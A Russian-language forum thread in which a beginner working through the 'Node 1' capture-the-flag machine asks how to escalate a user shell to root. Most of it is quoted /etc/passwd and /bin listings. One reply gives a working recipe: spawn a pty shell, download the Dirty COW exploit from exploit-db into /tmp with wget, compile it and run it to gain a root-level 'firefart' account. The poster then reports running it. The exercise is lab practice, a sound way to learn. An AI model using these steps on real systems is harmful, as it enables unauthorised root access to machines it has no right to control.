Как поднять права пользователя до рута?

M

Magnit

Добрый день.
Все еще прохожу одну CTF - NODE 1, дошел до шела.
В шел закачать ничего нельзя.
Команды sudo конечно тоже не пракатывают
Из того что есть:
Screenshot from 2018-08-27 08-31-00.png

а еще на команду cat /etc/passwd:
Код:
mark@node:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mongodb:x:111:65534::/home/mongodb:/bin/false
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash
вот два дня ищу понять не могу что где еще можно капнуть,
закачать нагрузку через wget нельзя пишет что доступ запрещен, Empire не захотел на Линух шел работать.
В общем подскажите начинающему что еще можно сделать?
если делать grep tom\admin получаю страниц 20 инфы и вся она с Permission denied
 
sudo

sudo

Grey Team
24.02.2017
70
81
Ты по сути никакой инфы о системе нам и не сообщил.
Дай вывод uname -r ещё можешь это посмотреть ls -la /bin и кронтаб чекни.
Ну или втупую залей linenum, авось чего и найдёт.
 
C

CHEATER

Well-known member
09.09.2017
79
42
Почему в shell скачать нельзя, там ни в одной директории c правами на запись нет? Сомневаюсь...
 
  • Нравится
Реакции: Magnit
NeskO

NeskO

Well-known member
10.01.2018
112
52
Добрый день.
Все еще прохожу одну CTF - NODE 1, дошел до шела.
В шел закачать ничего нельзя.
Команды sudo конечно тоже не пракатывают
Из того что есть:
Посмотреть вложение 21687
а еще на команду cat /etc/passwd:
Код:
mark@node:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mongodb:x:111:65534::/home/mongodb:/bin/false
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash
вот два дня ищу понять не могу что где еще можно капнуть,
закачать нагрузку через wget нельзя пишет что доступ запрещен, Empire не захотел на Линух шел работать.
В общем подскажите начинающему что еще можно сделать?
если делать grep tom\admin получаю страниц 20 инфы и вся она с Permission denied
в /tmp качай
Код:
python -c 'import pty;pty.spawn("/bin/bash")'
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
gcc -pthread dirty.c -o dirty –lcrypt
./dirthy
firefart - должно сработать
 
  • Нравится
Реакции: dominikanec и Magnit
M

Magnit

Код:
mark@node:~$ uname -r
4.4.0-93-generic
Ну на вторую команду там листа 3, когда пытаюсь здесь разместить все не влазит в сообщение

скачать нельзя т.к. на команду wget получаю Permission denied

Bash:
mark@node:~$ ls -la /bin
total 16008
drwxr-xr-x  2 root root    4096 Aug 29  2017 .
drwxr-xr-x 25 root root    4096 Sep  2  2017 ..
-rwxr-xr-x  1 root root 1037528 May 16  2017 bash
-rwxr-xr-x  1 root root  520992 Jun 16  2017 btrfs
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfs-calc-size
lrwxrwxrwx  1 root root       5 Jun 16  2017 btrfsck -> btrfs
-rwxr-xr-x  1 root root  278376 Jun 16  2017 btrfs-convert
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfs-debug-tree
-rwxr-xr-x  1 root root  245368 Jun 16  2017 btrfs-find-root
-rwxr-xr-x  1 root root  270136 Jun 16  2017 btrfs-image
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfs-map-logical
-rwxr-xr-x  1 root root  245368 Jun 16  2017 btrfs-select-super
-rwxr-xr-x  1 root root  253816 Jun 16  2017 btrfs-show-super
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfstune
-rwxr-xr-x  1 root root  245368 Jun 16  2017 btrfs-zero-log
-rwxr-xr-x  3 root root   31288 May 20  2015 bunzip2
-rwxr-xr-x  1 root root 1964536 Aug 19  2015 busybox
-rwxr-xr-x  3 root root   31288 May 20  2015 bzcat
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzcmp -> bzdiff
-rwxr-xr-x  1 root root    2140 May 20  2015 bzdiff
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzegrep -> bzgrep
-rwxr-xr-x  1 root root    4877 May 20  2015 bzexe
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzfgrep -> bzgrep
-rwxr-xr-x  1 root root    3642 May 20  2015 bzgrep
-rwxr-xr-x  3 root root   31288 May 20  2015 bzip2
-rwxr-xr-x  1 root root   14616 May 20  2015 bzip2recover
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzless -> bzmore
-rwxr-xr-x  1 root root    1297 May 20  2015 bzmore
-rwxr-xr-x  1 root root   52080 Mar  2  2017 cat
-rwxr-xr-x  1 root root   14752 Feb  7  2016 chacl
-rwxr-xr-x  1 root root   60272 Mar  2  2017 chgrp
-rwxr-xr-x  1 root root   56112 Mar  2  2017 chmod
-rwxr-xr-x  1 root root   64368 Mar  2  2017 chown
-rwxr-xr-x  1 root root   10536 Sep 22  2016 chvt
-rwxr-xr-x  1 root root  151024 Mar  2  2017 cp
-rwxr-xr-x  1 root root  141472 Feb 18  2016 cpio
-rwxr-xr-x  1 root root  154072 Feb 17  2016 dash
-rwxr-xr-x  1 root root   68464 Mar  2  2017 date
-rwxr-xr-x  1 root root   72632 Mar  2  2017 dd
-rwxr-xr-x  1 root root   97912 Mar  2  2017 df
-rwxr-xr-x  1 root root  126584 Mar  2  2017 dir
-rwxr-xr-x  1 root root   60680 Jun 14  2017 dmesg
lrwxrwxrwx  1 root root       8 Aug 29  2017 dnsdomainname -> hostname
lrwxrwxrwx  1 root root       8 Aug 29  2017 domainname -> hostname
-rwxr-xr-x  1 root root   82328 Sep 22  2016 dumpkeys
-rwxr-xr-x  1 root root   31376 Mar  2  2017 echo
-rwxr-xr-x  1 root root   51512 Apr 26  2014 ed
-rwxr-xr-x  1 root root      28 Apr 29  2016 egrep
-rwxr-xr-x  1 root root   27280 Mar  2  2017 false
-rwxr-xr-x  1 root root   10544 Sep 22  2016 fgconsole
-rwxr-xr-x  1 root root      28 Apr 29  2016 fgrep
-rwxr-xr-x  1 root root   49576 Jun 14  2017 findmnt
-rwxr-xr-x  1 root root    1185 Jun 16  2017 fsck.btrfs
-rwxr-xr-x  1 root root   36024 Feb  7  2016 fuser
-rwsr-xr-x  1 root root   30800 Jul 12  2016 fusermount
-rwxr-xr-x  1 root root   23752 Feb  7  2016 getfacl
-rwxr-xr-x  1 root root  211224 Apr 29  2016 grep
-rwxr-xr-x  2 root root    2301 Oct 27  2014 gunzip
-rwxr-xr-x  1 root root    5927 Oct 27  2014 gzexe
-rwxr-xr-x  1 root root   98240 Oct 27  2014 gzip
-rwxr-xr-x  1 root root   14800 Nov 24  2015 hostname
-rwxr-xr-x  1 root root  376192 May  5  2017 ip
-rwxr-xr-x  1 root root  498936 Jul 19  2017 journalctl
-rwxr-xr-x  1 root root   10536 Sep 22  2016 kbd_mode
-rwxr-xr-x  1 root root   23152 Nov 21  2016 kill
-rwxr-xr-x  1 root root  150600 Jul 25  2017 kmod
-rwxr-xr-x  1 root root  170728 Apr  5  2017 less
-rwxr-xr-x  1 root root   10256 Apr  5  2017 lessecho
lrwxrwxrwx  1 root root       8 Aug 29  2017 lessfile -> lesspipe
-rwxr-xr-x  1 root root   19824 Apr  5  2017 lesskey
-rwxr-xr-x  1 root root    7764 Apr  5  2017 lesspipe
-rwxr-xr-x  1 root root   56152 Mar  2  2017 ln
-rwxr-xr-x  1 root root  111496 Sep 22  2016 loadkeys
-rwxr-xr-x  1 root root   48128 May 17  2017 login
-rwxr-xr-x  1 root root  453848 Jul 19  2017 loginctl
-rwxr-xr-x  1 root root  105136 Jan 28  2017 lowntfs-3g
-rwxr-xr-x  1 root root  126584 Mar  2  2017 ls
-rwxr-xr-x  1 root root   77280 Jun 14  2017 lsblk
lrwxrwxrwx  1 root root       4 Aug 29  2017 lsmod -> kmod
-rwxr-xr-x  1 root root   76848 Mar  2  2017 mkdir
-rwxr-xr-x  1 root root  265928 Jun 16  2017 mkfs.btrfs
-rwxr-xr-x  1 root root   64496 Mar  2  2017 mknod
-rwxr-xr-x  1 root root   39728 Mar  2  2017 mktemp
-rwxr-xr-x  1 root root   39768 Jun 14  2017 more
-rwsr-xr-x  1 root root   40152 Jun 14  2017 mount
-rwxr-xr-x  1 root root   14768 Jun 14  2017 mountpoint
lrwxrwxrwx  1 root root      20 Aug 29  2017 mt -> /etc/alternatives/mt
-rwxr-xr-x  1 root root   68824 Feb 18  2016 mt-gnu
-rwxr-xr-x  1 root root  130488 Mar  2  2017 mv
-rwxr-xr-x  1 root root  208480 Feb 15  2017 nano
lrwxrwxrwx  1 root root      20 Aug 29  2017 nc -> /etc/alternatives/nc
-rwxr-xr-x  1 root root   31248 Dec  4  2012 nc.openbsd
lrwxrwxrwx  1 root root      24 Aug 29  2017 netcat -> /etc/alternatives/netcat
-rwxr-xr-x  1 root root  119624 Jun 30  2014 netstat
-rwxr-xr-x  1 root root  678496 Jul 19  2017 networkctl
lrwxrwxrwx  1 root root       8 Aug 29  2017 nisdomainname -> hostname
-rwsr-xr-x  1 root root  142032 Jan 28  2017 ntfs-3g
-rwxr-xr-x  1 root root   10312 Jan 28  2017 ntfs-3g.probe
-rwxr-xr-x  1 root root   67608 Jan 28  2017 ntfs-3g.secaudit
-rwxr-xr-x  1 root root   18424 Jan 28  2017 ntfs-3g.usermap
-rwxr-xr-x  1 root root   26728 Jan 28  2017 ntfscat
-rwxr-xr-x  1 root root   30824 Jan 28  2017 ntfscluster
-rwxr-xr-x  1 root root   34920 Jan 28  2017 ntfscmp
-rwxr-xr-x  1 root root   34928 Jan 28  2017 ntfsfallocate
-rwxr-xr-x  1 root root   39024 Jan 28  2017 ntfsfix
-rwxr-xr-x  1 root root   55416 Jan 28  2017 ntfsinfo
-rwxr-xr-x  1 root root   31928 Jan 28  2017 ntfsls
-rwxr-xr-x  1 root root   30824 Jan 28  2017 ntfsmove
-rwxr-xr-x  1 root root   38944 Jan 28  2017 ntfstruncate
-rwxr-xr-x  1 root root   47752 Jan 28  2017 ntfswipe
lrwxrwxrwx  1 root root       6 Aug 29  2017 open -> openvt
-rwxr-xr-x  1 root root   18968 Sep 22  2016 openvt
lrwxrwxrwx  1 root root      14 Aug 29  2017 pidof -> /sbin/killall5
-rwsr-xr-x  1 root root   44168 May  7  2014 ping
-rwsr-xr-x  1 root root   44680 May  7  2014 ping6
-rwxr-xr-x  1 root root   35504 May 10  2016 plymouth
-rwxr-xr-x  1 root root   97408 Nov 21  2016 ps
-rwxr-xr-x  1 root root   31472 Mar  2  2017 pwd
lrwxrwxrwx  1 root root       4 Aug 29  2017 rbash -> bash
-rwxr-xr-x  1 root root   39632 Mar  2  2017 readlink
-rwxr-xr-x  1 root root      89 Apr 26  2014 red
-rwxr-xr-x  1 root root   60272 Mar  2  2017 rm
-rwxr-xr-x  1 root root   39632 Mar  2  2017 rmdir
lrwxrwxrwx  1 root root       4 Feb 15  2017 rnano -> nano
-rwxr-xr-x  1 root root   19320 Jan 26  2016 run-parts
-rwxr-xr-x  1 root root   73424 Feb 12  2016 sed
-rwxr-xr-x  1 root root   36296 Feb  7  2016 setfacl
-rwxr-xr-x  1 root root   39952 Sep 22  2016 setfont
-rwxr-xr-x  1 root root   30875 Feb  1  2017 setupcon
lrwxrwxrwx  1 root root       4 Aug 29  2017 sh -> dash
lrwxrwxrwx  1 root root       4 Aug 29  2017 sh.distrib -> dash
-rwxr-xr-x  1 root root   31408 Mar  2  2017 sleep
-rwxr-xr-x  1 root root  115816 May  5  2017 ss
lrwxrwxrwx  1 root root       7 Aug 19  2015 static-sh -> busybox
-rwxr-xr-x  1 root root   72496 Mar  2  2017 stty
-rwsr-xr-x  1 root root   40128 May 17  2017 su
-rwxr-xr-x  1 root root   31408 Mar  2  2017 sync
-rwxr-xr-x  1 root root  659848 Jul 19  2017 systemctl
lrwxrwxrwx  1 root root      20 Aug 29  2017 systemd -> /lib/systemd/systemd
-rwxr-xr-x  1 root root   51656 Jul 19  2017 systemd-ask-password
-rwxr-xr-x  1 root root   39344 Jul 19  2017 systemd-escape
-rwxr-xr-x  1 root root   64080 Jul 19  2017 systemd-hwdb
-rwxr-xr-x  1 root root  281840 Jul 19  2017 systemd-inhibit
-rwxr-xr-x  1 root root   47544 Jul 19  2017 systemd-machine-id-setup
-rwxr-xr-x  1 root root   35248 Jul 19  2017 systemd-notify
-rwxr-xr-x  1 root root  133704 Jul 19  2017 systemd-tmpfiles
-rwxr-xr-x  1 root root   68032 Jul 19  2017 systemd-tty-ask-password-agent
-rwxr-xr-x  1 root root   23144 Jun 14  2017 tailf
-rwxr-xr-x  1 root root  383632 Nov 17  2016 tar
-rwxr-xr-x  1 root root   10416 Jan 26  2016 tempfile
-rwxr-xr-x  1 root root   64432 Mar  2  2017 touch
-rwxr-xr-x  1 root root   27280 Mar  2  2017 true
-rwxr-xr-x  1 root root  449136 Jul 19  2017 udevadm
-rwxr-xr-x  1 root root   14328 Jul 12  2016 ulockmgr_server
-rwsr-xr-x  1 root root   27608 Jun 14  2017 umount
-rwxr-xr-x  1 root root   31440 Mar  2  2017 uname
-rwxr-xr-x  2 root root    2301 Oct 27  2014 uncompress
-rwxr-xr-x  1 root root    2762 Sep 22  2016 unicode_start
-rwxr-xr-x  1 root root  126584 Mar  2  2017 vdir
-rwxr-xr-x  1 root root   31376 Jun 14  2017 wdctl
-rwxr-xr-x  1 root root     946 Jan 26  2016 which
-rwxr-xr-x  1 root root   27432 Jan 18  2016 whiptail
lrwxrwxrwx  1 root root       8 Aug 29  2017 ypdomainname -> hostname
-rwxr-xr-x  1 root root    1937 Oct 27  2014 zcat
-rwxr-xr-x  1 root root    1777 Oct 27  2014 zcmp
-rwxr-xr-x  1 root root    5764 Oct 27  2014 zdiff
-rwxr-xr-x  1 root root     140 Oct 27  2014 zegrep
-rwxr-xr-x  1 root root     140 Oct 27  2014 zfgrep
-rwxr-xr-x  1 root root    2131 Oct 27  2014 zforce
-rwxr-xr-x  1 root root    5938 Oct 27  2014 zgrep
-rwxr-xr-x  1 root root    2037 Oct 27  2014 zless
-rwxr-xr-x  1 root root    1910 Oct 27  2014 zmore
-rwxr-xr-x  1 root root    5047 Oct 27  2014 znew
 
C

CHEATER

Well-known member
09.09.2017
79
42
Код:
mark@node:~$ uname -r
4.4.0-93-generic
Ну на вторую команду там листа 3, когда пытаюсь здесь разместить все не влазит в сообщение

скачать нельзя т.к. на команду wget получаю Permission denied

Bash:
mark@node:~$ ls -la /bin
total 16008
drwxr-xr-x  2 root root    4096 Aug 29  2017 .
drwxr-xr-x 25 root root    4096 Sep  2  2017 ..
-rwxr-xr-x  1 root root 1037528 May 16  2017 bash
-rwxr-xr-x  1 root root  520992 Jun 16  2017 btrfs
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfs-calc-size
lrwxrwxrwx  1 root root       5 Jun 16  2017 btrfsck -> btrfs
-rwxr-xr-x  1 root root  278376 Jun 16  2017 btrfs-convert
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfs-debug-tree
-rwxr-xr-x  1 root root  245368 Jun 16  2017 btrfs-find-root
-rwxr-xr-x  1 root root  270136 Jun 16  2017 btrfs-image
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfs-map-logical
-rwxr-xr-x  1 root root  245368 Jun 16  2017 btrfs-select-super
-rwxr-xr-x  1 root root  253816 Jun 16  2017 btrfs-show-super
-rwxr-xr-x  1 root root  249464 Jun 16  2017 btrfstune
-rwxr-xr-x  1 root root  245368 Jun 16  2017 btrfs-zero-log
-rwxr-xr-x  3 root root   31288 May 20  2015 bunzip2
-rwxr-xr-x  1 root root 1964536 Aug 19  2015 busybox
-rwxr-xr-x  3 root root   31288 May 20  2015 bzcat
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzcmp -> bzdiff
-rwxr-xr-x  1 root root    2140 May 20  2015 bzdiff
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzegrep -> bzgrep
-rwxr-xr-x  1 root root    4877 May 20  2015 bzexe
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzfgrep -> bzgrep
-rwxr-xr-x  1 root root    3642 May 20  2015 bzgrep
-rwxr-xr-x  3 root root   31288 May 20  2015 bzip2
-rwxr-xr-x  1 root root   14616 May 20  2015 bzip2recover
lrwxrwxrwx  1 root root       6 Aug 29  2017 bzless -> bzmore
-rwxr-xr-x  1 root root    1297 May 20  2015 bzmore
-rwxr-xr-x  1 root root   52080 Mar  2  2017 cat
-rwxr-xr-x  1 root root   14752 Feb  7  2016 chacl
-rwxr-xr-x  1 root root   60272 Mar  2  2017 chgrp
-rwxr-xr-x  1 root root   56112 Mar  2  2017 chmod
-rwxr-xr-x  1 root root   64368 Mar  2  2017 chown
-rwxr-xr-x  1 root root   10536 Sep 22  2016 chvt
-rwxr-xr-x  1 root root  151024 Mar  2  2017 cp
-rwxr-xr-x  1 root root  141472 Feb 18  2016 cpio
-rwxr-xr-x  1 root root  154072 Feb 17  2016 dash
-rwxr-xr-x  1 root root   68464 Mar  2  2017 date
-rwxr-xr-x  1 root root   72632 Mar  2  2017 dd
-rwxr-xr-x  1 root root   97912 Mar  2  2017 df
-rwxr-xr-x  1 root root  126584 Mar  2  2017 dir
-rwxr-xr-x  1 root root   60680 Jun 14  2017 dmesg
lrwxrwxrwx  1 root root       8 Aug 29  2017 dnsdomainname -> hostname
lrwxrwxrwx  1 root root       8 Aug 29  2017 domainname -> hostname
-rwxr-xr-x  1 root root   82328 Sep 22  2016 dumpkeys
-rwxr-xr-x  1 root root   31376 Mar  2  2017 echo
-rwxr-xr-x  1 root root   51512 Apr 26  2014 ed
-rwxr-xr-x  1 root root      28 Apr 29  2016 egrep
-rwxr-xr-x  1 root root   27280 Mar  2  2017 false
-rwxr-xr-x  1 root root   10544 Sep 22  2016 fgconsole
-rwxr-xr-x  1 root root      28 Apr 29  2016 fgrep
-rwxr-xr-x  1 root root   49576 Jun 14  2017 findmnt
-rwxr-xr-x  1 root root    1185 Jun 16  2017 fsck.btrfs
-rwxr-xr-x  1 root root   36024 Feb  7  2016 fuser
-rwsr-xr-x  1 root root   30800 Jul 12  2016 fusermount
-rwxr-xr-x  1 root root   23752 Feb  7  2016 getfacl
-rwxr-xr-x  1 root root  211224 Apr 29  2016 grep
-rwxr-xr-x  2 root root    2301 Oct 27  2014 gunzip
-rwxr-xr-x  1 root root    5927 Oct 27  2014 gzexe
-rwxr-xr-x  1 root root   98240 Oct 27  2014 gzip
-rwxr-xr-x  1 root root   14800 Nov 24  2015 hostname
-rwxr-xr-x  1 root root  376192 May  5  2017 ip
-rwxr-xr-x  1 root root  498936 Jul 19  2017 journalctl
-rwxr-xr-x  1 root root   10536 Sep 22  2016 kbd_mode
-rwxr-xr-x  1 root root   23152 Nov 21  2016 kill
-rwxr-xr-x  1 root root  150600 Jul 25  2017 kmod
-rwxr-xr-x  1 root root  170728 Apr  5  2017 less
-rwxr-xr-x  1 root root   10256 Apr  5  2017 lessecho
lrwxrwxrwx  1 root root       8 Aug 29  2017 lessfile -> lesspipe
-rwxr-xr-x  1 root root   19824 Apr  5  2017 lesskey
-rwxr-xr-x  1 root root    7764 Apr  5  2017 lesspipe
-rwxr-xr-x  1 root root   56152 Mar  2  2017 ln
-rwxr-xr-x  1 root root  111496 Sep 22  2016 loadkeys
-rwxr-xr-x  1 root root   48128 May 17  2017 login
-rwxr-xr-x  1 root root  453848 Jul 19  2017 loginctl
-rwxr-xr-x  1 root root  105136 Jan 28  2017 lowntfs-3g
-rwxr-xr-x  1 root root  126584 Mar  2  2017 ls
-rwxr-xr-x  1 root root   77280 Jun 14  2017 lsblk
lrwxrwxrwx  1 root root       4 Aug 29  2017 lsmod -> kmod
-rwxr-xr-x  1 root root   76848 Mar  2  2017 mkdir
-rwxr-xr-x  1 root root  265928 Jun 16  2017 mkfs.btrfs
-rwxr-xr-x  1 root root   64496 Mar  2  2017 mknod
-rwxr-xr-x  1 root root   39728 Mar  2  2017 mktemp
-rwxr-xr-x  1 root root   39768 Jun 14  2017 more
-rwsr-xr-x  1 root root   40152 Jun 14  2017 mount
-rwxr-xr-x  1 root root   14768 Jun 14  2017 mountpoint
lrwxrwxrwx  1 root root      20 Aug 29  2017 mt -> /etc/alternatives/mt
-rwxr-xr-x  1 root root   68824 Feb 18  2016 mt-gnu
-rwxr-xr-x  1 root root  130488 Mar  2  2017 mv
-rwxr-xr-x  1 root root  208480 Feb 15  2017 nano
lrwxrwxrwx  1 root root      20 Aug 29  2017 nc -> /etc/alternatives/nc
-rwxr-xr-x  1 root root   31248 Dec  4  2012 nc.openbsd
lrwxrwxrwx  1 root root      24 Aug 29  2017 netcat -> /etc/alternatives/netcat
-rwxr-xr-x  1 root root  119624 Jun 30  2014 netstat
-rwxr-xr-x  1 root root  678496 Jul 19  2017 networkctl
lrwxrwxrwx  1 root root       8 Aug 29  2017 nisdomainname -> hostname
-rwsr-xr-x  1 root root  142032 Jan 28  2017 ntfs-3g
-rwxr-xr-x  1 root root   10312 Jan 28  2017 ntfs-3g.probe
-rwxr-xr-x  1 root root   67608 Jan 28  2017 ntfs-3g.secaudit
-rwxr-xr-x  1 root root   18424 Jan 28  2017 ntfs-3g.usermap
-rwxr-xr-x  1 root root   26728 Jan 28  2017 ntfscat
-rwxr-xr-x  1 root root   30824 Jan 28  2017 ntfscluster
-rwxr-xr-x  1 root root   34920 Jan 28  2017 ntfscmp
-rwxr-xr-x  1 root root   34928 Jan 28  2017 ntfsfallocate
-rwxr-xr-x  1 root root   39024 Jan 28  2017 ntfsfix
-rwxr-xr-x  1 root root   55416 Jan 28  2017 ntfsinfo
-rwxr-xr-x  1 root root   31928 Jan 28  2017 ntfsls
-rwxr-xr-x  1 root root   30824 Jan 28  2017 ntfsmove
-rwxr-xr-x  1 root root   38944 Jan 28  2017 ntfstruncate
-rwxr-xr-x  1 root root   47752 Jan 28  2017 ntfswipe
lrwxrwxrwx  1 root root       6 Aug 29  2017 open -> openvt
-rwxr-xr-x  1 root root   18968 Sep 22  2016 openvt
lrwxrwxrwx  1 root root      14 Aug 29  2017 pidof -> /sbin/killall5
-rwsr-xr-x  1 root root   44168 May  7  2014 ping
-rwsr-xr-x  1 root root   44680 May  7  2014 ping6
-rwxr-xr-x  1 root root   35504 May 10  2016 plymouth
-rwxr-xr-x  1 root root   97408 Nov 21  2016 ps
-rwxr-xr-x  1 root root   31472 Mar  2  2017 pwd
lrwxrwxrwx  1 root root       4 Aug 29  2017 rbash -> bash
-rwxr-xr-x  1 root root   39632 Mar  2  2017 readlink
-rwxr-xr-x  1 root root      89 Apr 26  2014 red
-rwxr-xr-x  1 root root   60272 Mar  2  2017 rm
-rwxr-xr-x  1 root root   39632 Mar  2  2017 rmdir
lrwxrwxrwx  1 root root       4 Feb 15  2017 rnano -> nano
-rwxr-xr-x  1 root root   19320 Jan 26  2016 run-parts
-rwxr-xr-x  1 root root   73424 Feb 12  2016 sed
-rwxr-xr-x  1 root root   36296 Feb  7  2016 setfacl
-rwxr-xr-x  1 root root   39952 Sep 22  2016 setfont
-rwxr-xr-x  1 root root   30875 Feb  1  2017 setupcon
lrwxrwxrwx  1 root root       4 Aug 29  2017 sh -> dash
lrwxrwxrwx  1 root root       4 Aug 29  2017 sh.distrib -> dash
-rwxr-xr-x  1 root root   31408 Mar  2  2017 sleep
-rwxr-xr-x  1 root root  115816 May  5  2017 ss
lrwxrwxrwx  1 root root       7 Aug 19  2015 static-sh -> busybox
-rwxr-xr-x  1 root root   72496 Mar  2  2017 stty
-rwsr-xr-x  1 root root   40128 May 17  2017 su
-rwxr-xr-x  1 root root   31408 Mar  2  2017 sync
-rwxr-xr-x  1 root root  659848 Jul 19  2017 systemctl
lrwxrwxrwx  1 root root      20 Aug 29  2017 systemd -> /lib/systemd/systemd
-rwxr-xr-x  1 root root   51656 Jul 19  2017 systemd-ask-password
-rwxr-xr-x  1 root root   39344 Jul 19  2017 systemd-escape
-rwxr-xr-x  1 root root   64080 Jul 19  2017 systemd-hwdb
-rwxr-xr-x  1 root root  281840 Jul 19  2017 systemd-inhibit
-rwxr-xr-x  1 root root   47544 Jul 19  2017 systemd-machine-id-setup
-rwxr-xr-x  1 root root   35248 Jul 19  2017 systemd-notify
-rwxr-xr-x  1 root root  133704 Jul 19  2017 systemd-tmpfiles
-rwxr-xr-x  1 root root   68032 Jul 19  2017 systemd-tty-ask-password-agent
-rwxr-xr-x  1 root root   23144 Jun 14  2017 tailf
-rwxr-xr-x  1 root root  383632 Nov 17  2016 tar
-rwxr-xr-x  1 root root   10416 Jan 26  2016 tempfile
-rwxr-xr-x  1 root root   64432 Mar  2  2017 touch
-rwxr-xr-x  1 root root   27280 Mar  2  2017 true
-rwxr-xr-x  1 root root  449136 Jul 19  2017 udevadm
-rwxr-xr-x  1 root root   14328 Jul 12  2016 ulockmgr_server
-rwsr-xr-x  1 root root   27608 Jun 14  2017 umount
-rwxr-xr-x  1 root root   31440 Mar  2  2017 uname
-rwxr-xr-x  2 root root    2301 Oct 27  2014 uncompress
-rwxr-xr-x  1 root root    2762 Sep 22  2016 unicode_start
-rwxr-xr-x  1 root root  126584 Mar  2  2017 vdir
-rwxr-xr-x  1 root root   31376 Jun 14  2017 wdctl
-rwxr-xr-x  1 root root     946 Jan 26  2016 which
-rwxr-xr-x  1 root root   27432 Jan 18  2016 whiptail
lrwxrwxrwx  1 root root       8 Aug 29  2017 ypdomainname -> hostname
-rwxr-xr-x  1 root root    1937 Oct 27  2014 zcat
-rwxr-xr-x  1 root root    1777 Oct 27  2014 zcmp
-rwxr-xr-x  1 root root    5764 Oct 27  2014 zdiff
-rwxr-xr-x  1 root root     140 Oct 27  2014 zegrep
-rwxr-xr-x  1 root root     140 Oct 27  2014 zfgrep
-rwxr-xr-x  1 root root    2131 Oct 27  2014 zforce
-rwxr-xr-x  1 root root    5938 Oct 27  2014 zgrep
-rwxr-xr-x  1 root root    2037 Oct 27  2014 zless
-rwxr-xr-x  1 root root    1910 Oct 27  2014 zmore
-rwxr-xr-x  1 root root    5047 Oct 27  2014 znew
cd
wget
Если нет
cd /tmp/
wget
Попробуйте так.
 
M

Magnit

Да Вы все правы в tmp wget сработал.
Просто в других директориях, в которых пробовал, не срабатывал

Bash:
mark@node:/tmp$ ./dirty
